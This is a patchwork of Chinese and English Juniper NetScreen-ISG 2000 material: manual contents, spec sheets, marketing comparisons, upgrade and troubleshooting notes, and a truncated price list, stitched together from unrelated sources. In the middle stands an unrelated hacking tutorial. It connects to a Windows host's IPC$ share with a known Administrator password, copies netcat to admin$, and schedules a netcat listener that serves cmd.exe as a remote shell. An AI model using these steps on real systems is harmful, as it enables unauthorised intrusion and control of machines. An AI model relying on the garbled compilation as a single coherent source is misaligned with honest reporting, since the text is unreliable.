NetScreen-ISG 2000

Juniper防火墙安装手册神州数码（深圳）有限公司二零零五年十二月Juniper 防火墙安装手册项目编号 Juniper200601 文档名称 Juniper防火墙安装手册编写人完成日期 2006.01.18文档修订记录：日期修订版本修订内容修订人2005.12.18 V1.0 NSRP设置、L2TP设置梁文辉2005.12.19 V1.0 透明模式、故障排除技巧刘平、李滨2006.01.16 V1.0 NAT模式和路由模式安装张坤目录一、透明模式 (5)1．1 、网络结构图 (5)1．２、配置文件 (5)二、NAT模式 (8)2．1 、网络结构图 (8)2．２、安装步骤 (8)2.2.1 初始化配置 (8)2.2.2 管理功能设置 (11)2.2.3 安全区 (12)2.2.4 端口设置 (13)2.2.5 设置路由 (14)2.2.6 NAT设置 (16)2.2.7 端口服务 (19)2.2.8 定义策略 (21)三、路由模式 (24)3．1 、网络结构图 (24)3．２、安装步骤 (24)3.2.1 初始化配置 (24)3.2.2 管理功能设置 (27)3.2.3 安全区 (28)3.2.4 端口设置 (29)3.2.5 Route 模式设置 (30)3.2.6 设置路由 (31)3.2.7 定义策略 (32)四、动态路由 (35)五、VPN (35)5.1 C LIENT TO SITE (35)5.2 建立L2TP (44)5.2.1网络结构图 (44)5.2.2配置防火墙 (45)5.5.3 测试 (54)六、HA (56)６．１、网络拓扑结构图 (56)６．２、设置步骤 (56)６．３、命令行配置方式 (57)６．４、图形界面下的配置步骤 (61)七、故障排除 (65)7.1 常用TROUBLESHOOTING命令 (65)7.1.1 get system (65)7.1.2 get route (65)7.1.3 get arp (66)7.1.4 get sess (66)7.1.5 debug (67)7.1.6 set ffilter (68)7.1.7 snoop (69)7.2 T ROUBLESHOOTING ROUTE (70)7.2.1 Example 1- no route (70)7.2.2 Example 2- no policy (70)7.3 T ROUBLESHOOTING NAT (71)7.3.1 Interface NAT-src (71)7.3.2 policy NAT-src (71)7.3.3 policy NAT-dst (72)7.3.4 VIP (74)7.3.5 MIP (74)7.4 T ROUBLESHOOTING VPN (75)7.4.1 常用调试命令 (75)7.4.2 常见错误（以下日志是从VPN接收端收集） (76)一、透明模式1．1 、网络结构图接口为透明模式时，NetScreen设备过滤通过防火墙的数据包，而不会修改IP数据包包头中的任何源或目的地信息。

Juniper Networks NetScreen-ISG 2000(1)Maximum Performance and Capacity (2)Firewall performance 2 Gbps 3DES performance1 Gbps Deep Inspection performance 300 Mbps Concurrent sessions 512,000New sessions/second 30,000Policies 30,000Interfaces Up to 8 Mini GBIC (SX or LX),up to 28 10/100Mode of OperationLayer 2 mode (transparent mode)(5)Yes Layer 3 mode (route and/or NA T mode) Yes NA T (Network Address Translation)Yes PA T (Port Address Translation)Yes Policy-based NA T Yes Virtual IP 8(4)Mapped IP8,192(3)Users supportedUnrestrictedFirewallNumber of network attacks detected 31Network attack detection Yes DoS and DDoS protections Yes TCP reassembly for fragmented packet protection Yes Malformed packet protections Yes Deep Inspection firewall Yes Stateful protocol signatures Yes Protocols supported HTTP , FTP , SMTP , POP 3, IMAP , DNS Content Inspection Yes Malicious Web filtering up to 128 URLs External Web filtering (Websense)Yes Integrated Web filtering No VPNConcurrent VPN tunnels up to 10,000(3)Tunnel interfacesup to 1,024(3)DES (56-bit), 3DES (168-bit) and AES encryption Yes MD-5 and SHA-1 authentication Yes Manual Key, IKE, PKI (X.509)Yes Perfect forward secrecy (DH Groups)1,2,5Prevent replay attack Yes Remote access VPN Yes L2TP within IPSec Yes IPSec NA T traversalYes Redundant VPN gateways YesFirewall and VPN User Authentication Built-in (internal) database - user limit 1,500(3)3rd Party user authentication RADIUS, RSA SecurID, and LDAPXAUTH VPN authentication Yes Web-based authentication Yes System ManagementWebUI (HTTP and HTTPS)Yes Command Line Interface (console)Yes Command Line Interface (telnet)YesCommand Line Interface (SSH)Yes, v1.5 and v2.0 compatibleJuniper Networks NetScreen-ISG 2000(1)System ManagementNetScreen-Security ManagerYes All management via VPN tunnel on any interface Yes SNMP full custom MIB Yes Rapid deployment NoLogging/MonitoringSyslog (multiple servers)External, up to 4 serversE-mail (2 addresses)Yes NetIQ WebTrends External SNMP (v2)Yes TracerouteYes VPN tunnel monitorYes VirtualizationMaximum number of Virtual Systems 0 default, upgradeable to 50(6)Maximum number of security zones 26 default, upgradeable to 126(6)Maximum number of virtual routers 3 default, upgradeable to 53(6)Number of VLANs supported 500 max RoutingOSPF/BGP dynamic routing up to 8 instances each (3)RIPv2 dynamic routing up to 50 instances supported (3)Static routes20,000Source-based routingYesHigh Availability (HA)Active/Active Yes Active/PassiveYes Redundant interfacesYes Configuration synchronizationYes Session synchronization for firewall and VPN Yes Session failover for routing change Yes Device failure detection Yes Link failure detectionYes Authentication for new HA members Yes Encryption of HA traffic Yes IP Address Assignment StaticYes DHCP , PPPoE client No Internal DHCP server No DHCP relayYes PKI SupportPKI Certificate requests (PKCS 7 and PKCS 10)Yes Automated certificate enrollment (SCEP)Yes Online Certificate Status Protocol (OCSP)Yes Certificate Authorities Supported Verisign Yes Entrust Yes Microsoft Yes RSA KeonYes iPlanet (Netscape)Yes Baltimore Yes DOD PKIYesJuniper Network’s Integrated Security Gateway,the NetScreen-ISG 2000,is a purpose-built,high-performance system designed to deliver scalable network and application security for large enterprise,carrier and data center networks. Integrating best-of-breed Deep Inspection firewall,VPN and DoS solutions,the JuniperNetworks NetScreen-ISG 2000 enables secure,reliable connectivity along with network and application-level protection for key,high-traffic network segments. The NetScreen-ISG 2000 is built on Juniper Network’s next-generation architecture which includes a fourth generation security ASIC,the GigaScreen 3,high speedmicroprocessors and add-on security modules to provide the predictable,multi-Gigabit performance needed for the most demanding network segments.Juniper Networks NetScreen-ISG 2000Juniper NetworksNetScreen-ISG 2000(1)AdministrationLocal administrators database20External administrator database RADIUS/LDAP/SecurID Restricted administrative networks6Root Admin, Admin, and Read Only user levels YesSoftware upgrades TFTP/WebUI/NSMConfiguration Roll-back YesTraffic ManagementGuaranteed bandwidth NoMaximum bandwidth Yes, per physical interface Priority-bandwidth utilization NoDiffServ stamp Yes, per policyExternal FlashCompactFlash™Supports 128 or 512 MBIndustrial-Grade SanDisk Event logs and alarms YesSystem config script YesNetScreen ScreenOS Software YesDimensions and PowerDimensions (H/W/L) 5.25/17.5/23 inchesWeight52 lbs.Rack mountable19” standard, 23” optional Power Supply (AC)90 to 264 VAC, 250 watts Power Supply (DC)-36 to -72 VDC, 250 wattsLicensing Options: The NetScreen-ISG 2000 is available with two licensing options to provide two different levels of functionality and capacity.Advanced Models: The Advanced software license provides all of the features and capacities listed within this specsheet.Baseline Models: The Baseline software license provides an entry-level solution for customer environments where features such as Deep Inspection™, OSPF and BGP dynamic routing, advanced High Availabilty, and full capacity are not criticalrequirements. The following table shows the features and capacities that are different than the Advanced models:NetScreen-ISG 2000 Baseline AdvancedSessions256,000512,000Concurrent VPN tunnels1,00010,000Deep Inspection Firewall No YesVLANs100500OSPF/BGP No YesHigh Availability (HA)Active/Passive Active/ActiveCertificationsSafety CertificationsUL, CUL, CSA, CBEMC CertificationsFCC class A, CE class A, C-Tick, VCCI class AEnvironmentOperational temperature: 32°to 122°F, 0°to 50°CNon-operational temperature: -4°to 158°F, -20°to 70°CHumidity: 10 to 90% non-condensingMTBF (Bellcore model)7.6 yearsSecurityPending Ordering InformationProduct Part NumberNetScreen-ISG 2000 Bundles Advanced*NetScreen-ISG 2000 system 1 4 port 10/100 I/O Module NS-ISG-2000-P00A-S00 NetScreen-ISG 2000 system 1 8 port 10/100 I/O Module NS-ISG-2000-P01A-S00 NetScreen-ISG 2000 system 1 Dual-Port mini-GBIC NS-ISG-2000-P02A-S00I/O ModuleNetScreen-ISG 2000 system 1 dual port 10/100/1000NS-ISG-2000-P03A-S00Copper I/O ModuleNetScreen-ISG 2000 Bundles Baseline*Netscreen-ISG 2000 system 1 4 port 10/100 I/O Module NS-ISG-2000B-P00A-S00 Netscreen-ISG 2000 system 1 8 port 10/100 I/O Module NS-ISG-2000B-P01A-S00 Netscreen-ISG 2000 system 1 Dual port mini-GBIC NS-ISG-2000B-P02A-S00I/O ModuleNetScreen-ISG 2000 system 1 dual port 10/100/1000NS-ISG-2000B-P03A-S00Copper I/O Module*All systems include 2 AC power supplies and 0 virtual systemsNetScreen-ISG 2000 Virtual System UpgradesVSYS Upgrade 0 to 5NS-ISG-2000-VSYS-5 VSYS Upgrade 5 to 25NS-ISG-2000-VSYS-25 VSYS Upgrade 25 to 50NS-ISG-2000-VSYS-50 VSYS Upgrade 0 to 25NS-ISG-2000-VSYS-025 VSYS Upgrade 0 to 50NS-ISG-2000-VSYS-050Every Virtual System includes 1 virtual router and 2 security zones, usable in the virtual or root systemNetScreen-ISG 2000 ComponentsI/O Module - Dual Port Mini GBIC-SX NS-ISG-2000-SX2I/O Module - Dual Port Mini GBIC-LX NS-ISG-2000-LX2I/O Module - 4 Port 10/100 Fast Ethernet NS-ISG-2000-FE4I/O Module - 8 Port 10/100 Fast Ethernet NS-ISG-2000-FE8I/O Module - Dual Port 10/100/1000 Gig Ethernet NS-ISG-2000-TX2SX transceiver (mini-GBIC)NS-SYS-GBIC-MSXLX transceiver (mini-GBIC)NS-SYS-GBIC-MLXAC power supply NS-ISG-2000-PWR-AC DC power supply NS-ISG-2000-PWR-DC Japan power cord option NS-ISG-2000-JAPANFan module NS-ISG-2000-FANRack Mount Kit (19 in., all mounting hardware)NS-ISG-2000-RCK-01 Rack Mount Kit (23 in., all mounting hardware)NS-ISG-2000-RCK-02 Blank Interface Panel NS-ISG-2000-IPAN Blank Power Supply Cover NS-ISG-2000-PPAN(1)Performance, capacity and features listed are based upon systems ScreenOS 5.0.0 and may vary with other ScreenOS releases. Actual throughput may vary based upon packet size and enabled features.(2)Performance and capacity provided are the measured maximums under ideal testing conditions. May vary by deployment.(3)Shared among all Virtual Systems(4)Not available with Virtual Systems(5) NA T, PA T, policy based NA T, virtual IP, mapped IP, virtual systems, virtual routers, VLANs, OSPF, BGP, RIPv2, Active/Active HA,and IP address assignment are not available in layer 2 transparent mode(6)Requires purchase of virtual system key. Every virtual system includes one virtual router and two security zones, usable inthe virtual or root system.1194 North Mathilda Avenue Sunnyvale, CA 94089 USA Phone: 888-JUNIPER (888-586-4737) or 408-745-2000 Fax: 408-745-2100Copyright © 2004 Juniper Networks, Inc. All rights reserved.Juniper Networks, the Juniper Networks logo, NetScreen, NetScreen Technologies, GigaScreen, and the NetScreen logo are registered trademarks of Juniper Networks, Inc. NetScreen-5GT, NetScreen-5XP, NetScreen-5XT, NetScreen-25, NetScreen-50, NetScreen-100, NetScreen-204, NetScreen-208, NetScreen-500, NetScreen-5200, NetScreen-5400, NetScreen-Global PRO, NetScreen-Global PRO Express, NetScreen-Remote Security Client, NetScreen-Remote VPN Client, NetScreen-IDP 10, NetScreen-IDP 100, NetScreen-IDP 500, GigaScreen ASIC, GigaScreen-II ASIC, and NetScreen ScreenOS are trademarks of Juniper Networks, Inc. All other trademarks and registered trademarks are the property of their respective companies.Part Number: 110011-003 Sept 2004。

juniper防火墙功能怎么样juniper防火墙功能有很多，所以才能有效防护我们电脑，那么功能都有哪些呢?下面由店铺给你做出详细的juniper防火墙功能介绍!希望对你有帮助!juniper防火墙功能介绍一：现在仅存的SSG系列，适合中小企业用，但是功能单一，开通UTM要单独收费; 还有大型企业和电信用的ISG系列两款，不是标准1U的，比较大; 刚刚在国外发布的SRX系列，集路由、交换和防火墙为一体。

juniper防火墙功能介绍二：1、ISG 1000/2000防火墙：A、ISG是典型的 Firewall/产品B、该系列的局限是缺少全套的UTM功能C、附加的 IPS模块没有真正地和ISG融合在一起D、2004年开始销售，现在已经接近产品的终结。

其客户称之为“The last of the good NetScreen Firewalls” ，并且对Juniper转向采用SSG来争夺UTM市场表示不是很理解。

2、Secure Services Gateway (SSG)防火墙：A、可怜的性能和安全效果，绝大多数Juniper/NetScreen用户会选择ISG和IDP，而不会是SSG系列，据报道，SSG的反垃圾邮件功能效果非常差 (低于40%的捕获率)，在Web过滤上缺乏细粒度控制FortiGate IPS在性能和有效性上高于 SSG IPS，FortiGate UTM 安全服务是完全集成在一起的，在SSG平台调试各个厂家产品的问题是令人痛苦的。

B、SSG 550是Juniper UTM产品中最高端产品 (企业级)•性能远低于FortiGate-1000A和3600A•SSG 550防火墙吞吐量仅为1 Gbps， FG-1000A的防火墙吞吐量为 2 Gbps，FG3600A则为 6 Gbps•SSG 550 标准型号仅有 4个 10/100/1000接口，六个扩展插槽，每个插槽仅能支持一个千兆接口•Juniper对于每个额外接口要求支付$1500，要达到FG1000A的接口密度，需要共支付 $19,500，无法达到 12x GigE接口，也无法升级到10G接口C、它采用的是Kaspersky的AV, Symantec的反垃圾软件，SurfControl的Web过滤技术•它没有自己的团队支持这些服务，这就意味着响应速度慢，以及它合作伙伴发生变化给用户带来不可知的风险，比如以前它是与趋势的合作•Juniper没有获得ICSA labs的AV和IPS认证，也没有NSS UTM/AV认证，VB100%D、SSG 550 提供了额外的 WAN接口，比如 T1/E1, DS3 或 PPP (serial)•需要为每个端口支持$1000到$8500，其占据扩展接口，降低了端口密度，也许会比采用外接 WAN CSU/DSUs便宜一些。

瞻博网络公司集成安全网关(ISG)系列产品瞻博网络公司集成安全网关（ISG）适用于保护企业网络、运营商和数据中心环境的安全，在这些环境中，IP语音（VoIP）和流媒体等高级应用需要可扩展的一致性能。

瞻博网络公司的ISG 1000和ISG 2000 是专用的安全性解决方案，利用第四代安全ASIC（GigaScreen3）以及高速微处理器来提供无与伦比的防火墙和虚拟专网（VPN）性能。

ISG 1000 和ISG 2000 集成了最佳的防火墙，VPN 和可选的入侵检测与防护（IDP）功能，能够为关键的高流量网段提供安全可靠的连接以及网络和应用级保护。

产品描述瞻博网络公司的ISG 1000和ISG 2000是全面集成的防火墙/VPN 系统，提供：数千兆位的性能模块化架构丰富的虚拟化功能它们是面向大型企业、数据中心和电信运营商网络的理想解决方案。

基于ISG系列防火墙/VPN的系统提供入侵防护系统(IPS)、防垃圾邮件、Web过滤和互联网内容适配协议(ICAP)防病毒重定向支持等安全特性。

您可通过可选的集成IDP进一步扩展这个高级系统或将系统作为通用分组无线业务(GPRS)防火墙/VPN产品提供给移动网络电信运营商环境。

ISG系列防火墙/VPN 采用模块化架构，允许部署大量的铜线和光纤接口选件。

虚拟系统、虚拟局域网和安全区等高级特性允许灵活地分割并隔离属于不同可信级别的流量。

ISG 系列防火墙/VPN 允许对多个不同的防火墙实施检测或路由策略，以简化网络设计。

这将允许用户对流量流实施安全策略，不会对网络本身产生很大的影响–即便在极为复杂的环境中也不例外。

ISG系列的架构提供卓越的灵活性和高效性，在单一解决方案的三个不同的部署配置——防火墙/VPN、防火墙/VPN/IDP和IDP中均提供最先进的性能和最佳功能。

ISG 1000 最多支持两个安全模块，ISG 2000最多支持三个安全模块。

每个安全模块都有自己的专用处理资源和内存并提供旨在加速处理IDP数据包的技术，从而可减少所需的单独的安全产品和管理应用的数量，简化部署流程并降低网络复杂性，继而降低成本。

IPC是Internet Process Connection的缩写，也就是远程网络连接。

它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。

好了，废话少说，现在进入主题。

如何找到具有IPC漏洞的主机呢？以前我都是组合一个国外的扫描工具（名字我忘了）和KillUSA的LetMeIn，因为很多工作都是手工完成的，所以速度可想而知了。

现在因为有了小榕的流光2000，所以找到这样的主机实在是太简单了，具体操作我就不说了，大家可以参考该软件的说明文档。

好了，假设我们已经找到了一台这样的主机，地址是139.223.200.xxx，管理员帐号是Administrator，密码是123456。

进入命令行方式，正式开工。

需要说明的是，以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"命令成功完成。

F:\》copy nc.exe \\139.223.200.xxx\admin$已复制 1 个文件。

F:\》net time \\139.223.200.xxx\\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25在 \\139.223.200.xxx 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35命令成功完成。

F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe新增加了一项作业，其作业 ID = 0F:\》telnet 139.223.200.xxx 1234上面的命令很简单，你只要参考一下net，at和nc的用法就可以了。

Juniper NetScreen-ISG2000 防火墙测试报告目录1 测试目的 (2)2 测试环境与工具 (2)2.1测试拓扑 (2)2.2测试工具 (4)3 防火墙测试方案 (5)3.1安全功能完整性验证 (5)3.1.1 防火墙安全管理功能的验证 (5)3.1.2 防火墙组网功能验证 (6)3.1.3 防火墙访问控制功能验证 (6)3.1.4 防火墙日志审计及报警功能验证 (7)3.1.5 防火墙附加功能验证 (8)3.1.6 功能测试总结： (9)3.2抗攻击能力验证 (9)3.2.1 防火墙内核安全测试 (10)3.2.2 防火墙抗DoS/DDoS攻击测试 (10)3.2.3 抗攻击能力测试总结 (11)3.3防火墙基本性能验证 (11)3.3.1 吞吐量测试 (12)3.3.2 延迟测试 (13)3.3.3 丢包率测试 (13)3.3.4 并发连接测试 (14)3.3.5 性能测试总结 (14)3.4压力仿真测试 (15)3.4.1 大量的控制规则对性能影响的测试 (15)3.4.2 大量Session数对性能影响的测试 (17)3.4.3 压力测试总结 (17)3.5防火墙可靠性验证 (17)5.5.1防火墙与交换机Full Mesh连接，HA为Active-Passive (18)5.5.2防火墙与交换机Full Mesh连接，HA为Active-Active (21)5.5.3可靠性测试总结 (23)4 测试结论： (23)1测试目的防火墙是实现网络安全体系的重要设备，其目的是要在内部、外部两个网络之间建立一个安全控制点，通过允许、拒绝或重新定向经过防火墙的数据流，实现对进、出内部网络的服务和访问的审计和控制。

本次测试从稳定性、可靠性、安全性及性能表现等多方面综合验证Juniper NS-ISG2000防火墙的技术指标，并考虑XXX网络防火墙接入点的实际拓扑及业务流量，尽可能的利用测试环境及工具模拟实际状况，测试防火墙的各项指标，保证防火墙在XXX实际网络中运行的稳定可靠性。

ISG2000防火墙HA升级方案ISG2000防火墙升级方案防火墙双机热备在不中断业务的情况下升级设备过程：总体思路：在部署了双机热备的网络环境中升级软件版本，需要遵循主要原则是Active设备和Standby设备分别升级，先升级Standby设备，然后再升级Active设备，在升级过程中抢占功能必须关闭的，查看防火墙上的imagekey是否是新版版本，如果是旧版本需要加载新版本imagekey，否则会升级失败。

升级步骤：一、实施前准备1.1在主用防火墙上执行get session info 查看当前session数量，可作为升级后的比对参考；1.2在备用防火墙上执行exec nsrp sync global-config check-sum确认当前主备用防火墙配置同步（如果配置不同步，在备用防火墙上执行exec nsrp sync global-config save 同步防火墙配置），为升级后的主备同步比对参考；1.3备份主备防火墙的当前配置和OS，并保存在升级所使用的电脑终端上，为升级后的比对参考；（同时是为了回退需要）；save config to tftp save software from flash to tftp x.x.x.x filename1.4在防火墙上，通过get envar确认防火墙的bootloader版本（ISG2000需要将bootload升级到Load2000v117.d版本），如果bootload的版本低，先进行升级，再升级OS；1.5将防火墙新OS版本(6.3.0r26)以及bootloader文件拷贝至升级所使用的电脑终端，开启tftp server；二、验证引导加载程序和ScreenOS固件1.检查已安装的图像密钥如果已安装imagekey，您将看到类似于以下的输出（非零值）。

如果输出显示全零（0），则表示没有安装的图像密钥。

注意：设备无法存储多个图像密钥。

Juniper ISG2000网络安全解决方案建议书美国Juniper网络公司目录1前言 (3)1.1范围定义 (3)1.2参考标准 (3)2系统脆弱性和风险分析 (4)2.1网络边界脆弱性和风险分析 (4)2.2网络内部脆弱性和风险分析 (4)3系统安全需求分析 (5)3.1边界访问控制安全需求 (5)3.2应用层攻击和蠕虫的检测和阻断需求 (7)3.3安全管理需求 (8)4系统安全解决方案 (9)4.1设计目标 (9)4.2设计原则 (9)4.3安全产品的选型原则 (10)4.4整体安全解决方案 (11)4.4.1访问控制解决方案 (11)4.4.2防拒绝服务攻击解决方案 (13)4.4.3应用层防护解决方案 (18)4.4.4安全管理解决方案 (21)5方案中配置安全产品简介 (22)5.1J UNIPER公司介绍 (22)5.2J UNIPER ISG2000系列安全网关 (25)1前言1.1 范围定义本文针对的是XXX网络的信息安全问题，从对象层次上讲，它比较全面地囊括了从物理安全、网络安全、系统安全、应用安全到业务安全的各个层次。

原则上与信息安全风险有关的因素都应在考虑范围内，但为了抓住重点，体现主要矛盾，在本文主要针对具有较高风险级别的因素加以讨论。

从安全手段上讲，本文覆盖了管理和技术两大方面，其中安全管理体系包括策略体系、组织体系和运作体系。

就XXX的实际需要，本次方案将分别从管理和技术两个环节分别给出相应的解决方案。

1.2 参考标准XXX属于一个典型的行业网络，必须遵循行业相关的保密标准，同时，为了保证各种网络设备的兼容性和业务的不断发展需要，也必须遵循国际上的相关的统一标准，我们在设计XXX的网络安全解决方案的时候，主要参考的标准如下：✓NAS IATF3.1美国国防部信息保障技术框架v3.1✓ISO15408 / GB/T 18336信息技术安全技术信息技术安全性评估准则，第一部分简介和一般模型✓ISO15408 / GB/T 18336信息技术安全技术信息技术安全性评估准则，第二部分安全功能要求✓ISO15408 / GB/T 18336信息技术安全技术信息技术安全性评估准则，第三部分安全保证要求✓加拿大信息安全技术指南, 1997✓ISO17799第一部分, 信息安全管理Code of Practice for Information Security Management✓GB/T 18019-1999 包过滤防火墙安全技术要求；✓GB/T 18020-1999 应用级防火墙安全技术要求；✓国家973信息与网络安全体系研究G1999035801课题组IATF《信息技术保障技术框架》。

juniper ISG2000 CPU 使用率过高的排查方法一、CPU利用率历史记录查看nsisg2000(M)-> get performance cpu detailAverage System Utilization: 28%Last 60 seconds:59: 50* 58: 47 57: 46 56: 54* 55: 42 54: 4753: 49 52: 39 51: 36 50: 43 49: 33 48: 4347: 45 46: 41 45: 42 44: 44 43: 33 42: 3941: 43 40: 30 39: 35 38: 43 37: 33 36: 4335: 39 34: 40 33: 37 32: 39 31: 34 30: 4129: 34 28: 35 27: 39 26: 39 25: 37 24: 4223: 37 22: 42 21: 41 20: 38 19: 37 18: 4517: 37 16: 42 15: 44 14: 44 13: 38 12: 4811: 37 10: 40 9: 46 8: 38 7: 40 6: 465: 37 4: 43 3: 46 2: 36 1: 40 0: 46Last 60 minutes:59: 41 58: 39 57: 39 56: 46 55: 40 54: 3853: 38 52: 38 51: 38 50: 38 49: 39 48: 3847: 39 46: 41 45: 34 44: 39 43: 39 42: 3741: 38 40: 37 39: 36 38: 38 37: 39 36: 3735: 38 34: 37 33: 35 32: 38 31: 37 30: 3629: 35 28: 34 27: 38 26: 43 25: 37 24: 3723: 36 22: 41 21: 39 20: 42 19: 41 18: 4617: 59* 16: 40 15: 38 14: 33 13: 39 12: 3811: 35 10: 34 9: 34 8: 38 7: 36 6: 345: 34 4: 36 3: 39 2: 39 1: 39 0: 39Last 24 hours:23: 38 22: 23 21: 22 20: 26 19: 54* 18: 54*17: 50* 16: 29 15: 10 14: 9 13: 9 12: 911: 9 10: 9 9: 9 8: 9 7: 10 6: 115: 16 4: 46 3: 46 2: 55* 1: 74**0: 53*从设备输出显示中可以看到，在过去的24小时中，曾经出现过CPU利用率接近一个较高水平的情况。

Juniper ISG2000 集成安全网关---- 一个全面集成的FW/VPN/IDP系统，具有多Gb性能、一个模块化架构和丰富的虚拟化功能，提供高达4 Gbps防火墙吞吐量和2 Gbps可选集成IDP吞吐量。

基本的FW/VPN系统支持4个I/O 模块和3个安全模块，用于IDP集成。

主要技术参数备注：(1)本文提供的并发会话数是根据目前所提供ISG硬件而得出的最大值。

原来的ISG产品可能需要可选的内存升级才能实现最大的并发会话数量。

在不采用可选的内存升级的情况下，ISG 1000的最大防火墙/VPN并发会话数为250,000，ISG 2000的为500,000。

已安装了可选IDP升级包的原有ISG 产品可实现最大的并发会话数量，无需内存升级。

(2)L2透明模式中不支持NAT、PAT、基于策略的NAT、虚拟IP、映射IP、虚拟系统、虚拟路由器、VLAN、OSPF、BGP、RIPV2、主/主HA和IP地址分配。

防火墙的关键指标并发连接数指的是什么？－选择防火墙必读！并发连接数是指防火墙或代理服务器对其业务信息流的处理能力，是防火墙能够同时处理的点对点连接的最大数目，它反映出防火墙设备对多个连接的访问控制能力和连接状态跟踪能力，这个参数的大小直接影响到防火墙所能支持的最大信息点数。

并发连接数是衡量防火墙性能的一个重要指标。

在目前市面上常见防火墙设备的说明书中大家可以看到，从低端设备的500、1000个并发连接，一直到高端设备的数万、数十万并发连接，存在着好几个数量级的差异。

那么，并发连接数究竟是一个什么概念呢？它的大小会对用户的日常使用产生什么影响呢？要了解并发连接数，首先需要明白一个概念，那就是“会话”。

这个“会话”可不是我们平时的谈话，但是可以用平时的谈话来理解，两个人在谈话时，你一句，我一句，一问一答，我们把它称为一次对话，或者叫会话。

同样，在我们用电脑工作时，打开的一个窗口或一个Web页面，我们也可以把它叫做一个“会话”，扩展到一个局域网里面，所有用户要通过防火墙上网，要打开很多个窗口或Web页面发（即会话），那么，这个防火墙，所能处理的最大会话数量，就是“并发连接数”。

Juniper 网络公司M120多业务边缘路由器产品说明M120平台在冗余功能和扩展能力方面取得了重大进展，再一次证实了Juniper 网络公司在技术方面处于领先地位。

M120支持在城域网和广域网环境中无中断地向以太网业务迁移，同时保持基于 ATM 和帧中继的传统创收业务的完整性。

功能丰富的M120平台是多种部署的理想选择，包括：●可扩展的多业务边缘——非常适合中小型营业点（POP ）和交换局（CO ）。

●中小型核心网络——M120平台提供先进的路由功能和多条10 Gb 链路，且可扩展支持超过100万个对等体，是互联网Peering 与路由反射器应用的最佳选择。

●紧凑POP 路由器——M120平台具有10 Gb 上行链路和面向客户的广泛接口，能够在单个平台上同时提供边缘业务和骨干路由业务。

●大型企业——为大型企业提供功能强大的广域网网关解决方案，支持第2层和第3层VPN ，包括企业MPLS 和VPLS ，并提供支持话音、视频和多种数据业务所必需的高级QoS 功能。

●多业务边缘的以太网汇聚——支持多达128个千兆以太网用户端口，两条10 Gb 上行链路，并全面支持MPLS 承载以太网业务以及VPLS 、MPLS 、IP 、帧中继和ATM VPN 之间的互通。

M120平台是Juniper 网络公司M 系列产品家族的一个重要组成部分，能够提供可扩展的解决方案，为企业和服务供应商环境提供高级IP/MPLS 服务和多重播放服务。

这些服务包括多种VPN 、丰富的实时话音和视频业务、按需带宽、基于网络的安全业务、高价内容组播、IPv6功能、细粒度计帐等等。

随着新型多重播放服务应用的推出，市场对网络提出了复杂的新要求。

Juniper 网络公司M120平台通过多种关键特性和功能来满足这些需求，包括：●先进的服务质量保证和高可用性功能●增强的以太网端口和业务密度●灵活的10 Gb 接口，支持高带宽配置凭借业务构建架构的巨大灵活性和性能扩展空间，该业务产品组合也随着 JUNOS 操作系统软件各个版本的相继发布而不断扩展。

JUNIPER NETWORKS SECURITY_FW_VPN_IDP PRODUCT PRICING 型号产品描述NetScreen 5 Appliance and Hardware Security Client ProductsNS-5GT-001NetScreen-5GT 10 User with Power Supply, US, 110V onlyNS-5GT-003NetScreen-5GT 10 User with Power Supply, UKNS-5GT-005NetScreen-5GT 10 User with Power Supply, EURNS-5GT-007-NN NetScreen-5GT 10 User with Power Supply, JapanNS-5GT-008NetScreen-5GT 10 User with Switching Power Supply, US w/ detachablePower Cable, 100-240V, WWNS-5GT-011-A NetScreen-5GT ADSL Annex A, 10 User, US power cordNS-5GT-011-B NetScreen-5GT ADSL Annex B, 10 User, US power cordNS-5GT-013-A NetScreen-5GT ADSL Annex A, 10 User, UK Power CordNS-5GT-013-B NetScreen-5GT ADSL Annex B, 10 User, UK Power CordNS-5GT-015-A NetScreen-5GT ADSL Annex A, 10 User, European Power CordNS-5GT-015-B NetScreen-5GT ADSL Annex B, 10 User, European Power CordNS-5GT-016-A-AU NS-5GT ADSL Annex A, 10-User, AU Power Cord, Australia OnlyNS-5GT-016-A-NZ NS-5GT ADSL Annex A, 10-User, AU Power Cord, New Zealand OnlyNS-5GT-101NetScreen-5GT Plus with Power Supply, US, 110V onlyNS-5GT-103NetScreen-5GT Plus with Power Supply, UKNS-5GT-105NetScreen-5GT Plus with Power Supply, EURNS-5GT-107-NN NetScreen-5GT Plus with Power Supply, JapanNS-5GT-108NetScreen-5GT Plus with Switching Power Supply, US w/ detachable powercord, 100-240V, WWNS-5GT-111-A NetScreen-5GT ADSL Annex A, Plus, US power cordNS-5GT-111-B NetScreen-5GT ADSL Annex B, Plus, US power cordNS-5GT-113-A NetScreen-5GT ADSL Annex A, Plus, UK Power CordNS-5GT-113-B NetScreen-5GT ADSL Annex B, Plus, UK Power CordNS-5GT-115-A NetScreen-5GT ADSL Annex A, Plus, European power cordNS-5GT-115-B NetScreen-5GT ADSL Annex B, Plus, European power cordNS-5GT-116-A-AU NS-5GT ADSL Annex A, Plus, AU Power Cord, Australia OnlyNS-5GT-116-A-NZ NS-5GT ADSL Annex A, Plus, AU Power Cord, New Zealand OnlyNS-5GT-201NetScreen-5GT Extended with US Power Cord, 110V onlyNS-5GT-203NetScreen-5GT Extended with UK Power CordNS-5GT-205NetScreen-5GT Extended with European Power CordNS-5GT-207-NN NetScreen-5GT Extended with Japan Power CordNS-5GT-208NetScreen-5GT Extended With Switching Power Supply, US withdetachable power cord, 100-240V, WWNS-5GT-211-A NetScreen-5GT ADSL Annex A, Extended, US power cordNS-5GT-211-B NetScreen-5GT ADSL Annex B, Extended, US power cordNS-5GT-213-A NetScreen-5GT ADSL Annex A, Extended, UK Power CordNS-5GT-213-B NetScreen-5GT ADSL Annex B, Extended, UK Power CordNS-5GT-215-A NetScreen-5GT ADSL Annex A, Extended, European Power CordNS-5GT-215-B NetScreen-5GT ADSL Annex B, Extended, European Power CordNS-5GT-216-A-AU NS-5GT ADSL Annex A, Extended, AU Power Cord, Australia OnlyNS-5GT-216-A-NZ NS-5GT ADSL Annex A, Extended, AU Power Cord, New Zealand OnlyNS-5XT-001NetScreen-5XT (10 user)NS-5XT-003NetScreen-5XT UK Power cord (10 User)NS-5XT-005NetScreen-5XT Europe Power cordNS-5XT-007-NN 